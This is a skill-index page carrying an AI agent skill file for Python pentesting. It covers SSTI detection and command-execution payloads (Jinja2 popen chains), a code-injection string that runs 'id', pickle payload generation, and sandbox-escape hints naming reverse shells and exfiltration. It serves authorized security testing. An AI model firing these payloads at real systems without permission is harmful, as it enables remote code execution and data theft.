OpenSkillIndex← back to search

Hacktricks-skills python-pentesting

How to test for Python-based vulnerabilities including code execution, SSTI (Server-Side Template Injection), deserialization attacks, and sandbox escapes. Use this skill whenever the user mentions Python vulnerabilities, template injection, pickle deserialization, sandbox bypass, or needs to test Python code execution in web applications. Make sure to use this skill for any pentesting task involving Python backends, even if the user doesn't explicitly name the vulnerability type.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/python/SKILL.MD
source content

Python Pentesting

A skill for testing Python-based vulnerabilities in web applications and systems.

When to Use This Skill

Use this skill when:

  • Testing web applications with Python backends
  • Suspecting Server-Side Template Injection (SSTI)
  • Investigating pickle/deserialization vulnerabilities
  • Looking for code execution through Python
  • Attempting sandbox escape scenarios
  • Analyzing Python-based APIs or services

Quick Reference

Code Execution Testing

Test for basic code execution using string conversion:

"+str(True)+"  # If "True" appears in output, code execution is possible
"+str(1+1)+"   # If "2" appears, arithmetic execution works
"+str(__import__('os').popen('id').read())+"  # System command execution

SSTI Payloads

Start with simple payloads and escalate:

Detection:

  • {{7*7}}
    → returns 
    49
  • {{'test'*7}}
    → returns 
    testtesttesttesttesttesttest

Information Gathering:

  • {{config}}
    → Flask config object
  • {{self._TemplateReference__context}}
    → Jinja2 context
  • {{''.__class__.__mro__}}
    → Class hierarchy

Code Execution:

  • {{''.__class__.__mro__[1].__subclasses__()}}
    → Subclasses enumeration
  • {{config.__class__.__init__.__globals__['os'].popen('id').read()}}
    → Command execution

Deserialization Testing

Pickle Detection:

  • Look for 
    pickle.loads()
    or 
    pickle.load()
    in code
  • Check for 
    __reduce__
    or 
    __reduce_ex__
    methods
  • Identify serialized data in cookies, parameters, or files

Common Vectors:

  • Session cookies
  • API parameters
  • File uploads
  • Cache systems

Testing Workflow

Step 1: Identify Python Backend

  1. Check response headers for Python frameworks (Flask, Django, Pyramid)
  2. Look for Python-specific error messages
  3. Test with Python-specific payloads
  4. Review source code for Python imports

Step 2: Test for SSTI

  1. Basic Detection:

    Input: {{7*7}}
Expected: 49 (if vulnerable)

  2. Template Engine Identification:

    • Jinja2: 
      {{config}}
      , 
      {{self}}
    • Mako: 
      ${config}
    • Cheetah: 
      #$config

  3. Escalate to RCE: Use the 

    scripts/ssti-test.py
    script for automated testing.

Step 3: Test for Deserialization

  1. Identify Serialized Data:

    • Base64 encoded strings
    • Pickle magic bytes (
      \x80\x04
      or 
      \x80\x05
      )
    • YAML with 
      !!python/object

  2. Craft Exploits: Use 

    scripts/deserialization-test.py
    to generate payloads.

Step 4: Sandbox Escape

If code execution is limited:

  1. Check Available Modules:

    __import__('sys').modules.keys()

  2. Test Restricted Functions:

    • os.system()
    • subprocess.call()
    • eval()
    • exec()

  3. Use Alternative Methods:

    • socket
      for reverse shells
    • urllib
      for data exfiltration
    • tempfile
      for file creation

Scripts

SSTI Testing

Run 

scripts/ssti-test.py
to test endpoints for SSTI vulnerabilities:

python scripts/ssti-test.py --url "http://target.com/page?name={{7*7}}"

Deserialization Testing

Generate pickle payloads with 

scripts/deserialization-test.py
:

python scripts/deserialization-test.py --command "id" --output payload.pkl

Safety Guidelines

  • Authorization Required: Only test systems you have explicit permission to test
  • Rate Limiting: Don't overwhelm target systems with requests
  • Data Handling: Be careful with payloads that could corrupt data
  • Logging: Document all tests for reporting
  • Cleanup: Remove any files or changes made during testing

Common Frameworks

Flask

  • Config object: 
    config
  • Request object: 
    request
  • Current app: 
    current_app

Django

  • Settings: 
    settings
  • Request: 
    request
  • Templates: 
    context

Jinja2

  • Globals: 
    __globals__
  • Builtins: 
    __builtins__
  • Subclasses: 
    __subclasses__()

References

Next Steps

After identifying a vulnerability:

  1. Document: Record the vulnerability, payload, and impact
  2. Verify: Confirm the vulnerability is reproducible
  3. Assess Impact: Determine what data or systems are affected
  4. Report: Provide clear remediation guidance
  5. Remediate: Work with developers to fix the issue